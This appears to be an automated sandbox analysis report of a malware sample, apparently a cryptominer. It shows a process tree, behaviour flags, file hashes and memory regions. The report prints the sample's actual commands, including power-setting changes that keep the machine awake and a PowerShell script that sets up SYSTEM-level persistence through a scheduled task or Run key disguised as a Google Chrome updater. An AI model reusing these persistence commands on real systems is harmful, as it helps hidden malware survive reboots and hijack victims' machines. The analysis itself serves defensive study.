C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe piwxkhozdwrizr2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ajhvfdbttvpjvzel 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUDVw9rZbme/VWRaCGMVy5A4KWmOYusR4Ik0iMHdgwpNOcjbYY5GHdN0CGOwXnubuj1k8SXyOPHLg/wcO08HTPQBCprXvYsSFocqjzqXvCOk3makNm0IivIoZ1KZt2YxT6Ci+BE7B/M5vRdKOrAlIyiTLPowHv2xwlgKELrnhNzBo4cDejdbTidr1qPNdTi4IwjcYnuD1ZGEEk854175l0vqhgS0J4NKy9OfqC4ZDiL7DMzbXsHZBHh2Jw55sStIs/MAZNnhxYjBZpkoZpwPghg6VnLEX8RYirlFk+ArUNG/2+FGzSRQ3kSkHyDV437Fza2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\WatchRevoke.iso"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskeng.exetaskeng.exe {57E82506-49FA-411B-BED1-7D761428A450} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.1MB
MD5a12bc9557ad889a49e7b4f970c78dda8
SHA15383b8e6d09d41384281b95f9ccc8e050e7c04fa
SHA2569940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0
SHA512be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.1MB
MD5a12bc9557ad889a49e7b4f970c78dda8
SHA15383b8e6d09d41384281b95f9ccc8e050e7c04fa
SHA2569940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0
SHA512be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5ac18b59b4c9ac3faa2fc66c855326d56
SHA11821b4a4744b2321f35e62292b227e7d8cf88f62
SHA25659145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6
SHA512d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5ac18b59b4c9ac3faa2fc66c855326d56
SHA11821b4a4744b2321f35e62292b227e7d8cf88f62
SHA25659145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6
SHA512d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G7SFOCYLLPHTXY6PUHVN.tempFilesize
7KB
MD5ac18b59b4c9ac3faa2fc66c855326d56
SHA11821b4a4744b2321f35e62292b227e7d8cf88f62
SHA25659145537e4db61595798d8526451d3b4e5ccbd6bd225735b5276e17f5d5ae7a6
SHA512d7f1d476229e9776fc64149f160933d3b38887a36a98d950c478a4c8f000a1381af44bad932ea8a854e63063f749d657c91c0772036b5dbf10cd40dd5ea50b67
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD53e9af076957c5b2f9c9ce5ec994bea05
SHA1a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
2.1MB
MD5a12bc9557ad889a49e7b4f970c78dda8
SHA15383b8e6d09d41384281b95f9ccc8e050e7c04fa
SHA2569940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0
SHA512be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee
-
memory/324-113-0x0000000140000000-0x0000000140016000-memory.dmpFilesize
88KB
-
memory/324-106-0x0000000140000000-0x0000000140016000-memory.dmpFilesize
88KB
-
memory/812-82-0x00000000026B0000-0x0000000002730000-memory.dmpFilesize
512KB
-
memory/812-83-0x00000000026B0000-0x0000000002730000-memory.dmpFilesize
512KB
-
memory/812-84-0x00000000026BB000-0x00000000026F2000-memory.dmpFilesize
220KB
-
memory/908-94-0x00000000012AB000-0x00000000012E2000-memory.dmpFilesize
220KB
-
memory/908-93-0x00000000012A4000-0x00000000012A7000-memory.dmpFilesize
12KB
-
memory/912-75-0x000000013F700000-0x000000013F916000-memory.dmpFilesize
2.1MB
-
memory/912-54-0x000000013F700000-0x000000013F916000-memory.dmpFilesize
2.1MB
-
memory/960-70-0x0000000002350000-0x0000000002358000-memory.dmpFilesize
32KB
-
memory/960-69-0x000000001AF60000-0x000000001B242000-memory.dmpFilesize
2.9MB
-
memory/960-73-0x0000000002390000-0x0000000002410000-memory.dmpFilesize
512KB
-
memory/960-71-0x0000000002390000-0x0000000002410000-memory.dmpFilesize
512KB
-
memory/960-72-0x0000000002390000-0x0000000002410000-memory.dmpFilesize
512KB
-
memory/1104-142-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1104-137-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1104-138-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1104-143-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1212-90-0x000000000105B000-0x0000000001092000-memory.dmpFilesize
220KB
-
memory/1212-89-0x0000000001054000-0x0000000001057000-memory.dmpFilesize
12KB
-
memory/1528-60-0x0000000001DB0000-0x0000000001DB8000-memory.dmpFilesize
32KB
-
memory/1528-61-0x00000000023A4000-0x00000000023A7000-memory.dmpFilesize
12KB
-
memory/1528-62-0x00000000023AB000-0x00000000023E2000-memory.dmpFilesize
220KB
-
memory/1528-59-0x000000001B140000-0x000000001B422000-memory.dmpFilesize
2.9MB
-
memory/1668-101-0x000000013FC10000-0x000000013FE26000-memory.dmpFilesize
2.1MB
-
memory/1668-88-0x000000013FC10000-0x000000013FE26000-memory.dmpFilesize
2.1MB
-
memory/1992-110-0x0000000000B50000-0x0000000000B70000-memory.dmpFilesize
128KB
-
memory/1992-111-0x0000000000AE0000-0x0000000000B00000-memory.dmpFilesize
128KB
-
memory/1992-112-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-108-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-114-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-116-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-118-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-120-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-122-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-124-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-126-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-107-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-129-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-131-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-133-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-135-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-105-0x0000000000AE0000-0x0000000000B00000-memory.dmpFilesize
128KB
-
memory/1992-104-0x0000000000B50000-0x0000000000B70000-memory.dmpFilesize
128KB
-
memory/1992-139-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-141-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-103-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-102-0x0000000000040000-0x0000000000060000-memory.dmpFilesize
128KB
-
memory/1992-145-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-147-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-149-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-151-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-153-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-155-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-157-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-159-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-161-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-163-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-165-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-167-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-169-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB
-
memory/1992-171-0x0000000140000000-0x00000001407F4000-memory.dmpFilesize
8.0MB